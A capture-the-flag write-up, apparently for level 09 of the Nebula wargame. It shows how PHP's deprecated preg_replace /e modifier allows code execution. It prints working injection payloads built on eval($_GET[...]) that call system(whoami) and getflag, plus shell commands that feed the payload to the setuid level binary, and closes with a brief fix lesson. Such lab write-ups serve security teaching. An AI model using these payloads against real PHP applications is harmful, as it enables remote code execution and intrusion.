by Benedikt Ferling -- Level 09


  1. Using deprecated functions/modifiers, that are known to be vulnerable.


The script uses two built-in functions that might be exploitable - preg_replace and file_get_contents. The latter does not show any indicators of beeing exploitable in this case. instead shows a remote code execution for the function preg_replace with the pattern modifier e. That’s what we have in line 15. According to the documentation we can simply inject code with this snippet:


Since we have a boundary(the regexp) we need to modify the snippet:

[email {${eval($_GET[php_code])}}]

Just note the surrounding [] and the email-string. So having this, we put our code we want to execute inside:

[email {${eval($_GET[exec(getflag)])}}]


[email {${eval($_GET[system(whoami)])}}]

This leads to the exploit.

echo '[email {${eval($_GET[system(whoami)])}}]' > /tmp/flag09_exploit
/home/flag09/flag09 /tmp/flag09_exploit

Thats it. One will notice, that the return value/string of the shellcommand(getflag/whoami) is inside all the output warnings and notices of php.

Lesson / How to fix

  1. Do not use deprecated functions!

Read the documentation! Keep track of the changes of what you are using! Stay up to date /and/ get notified about new problems(mailing-lists, …).

Since I do not know the intention of the code, I cannot give any fix to this problem. There would have been too many assumptions.

other levels…

00 01 02 03 04 05 06 07 08 09
10 11 12 13 14 15 16 17 18 19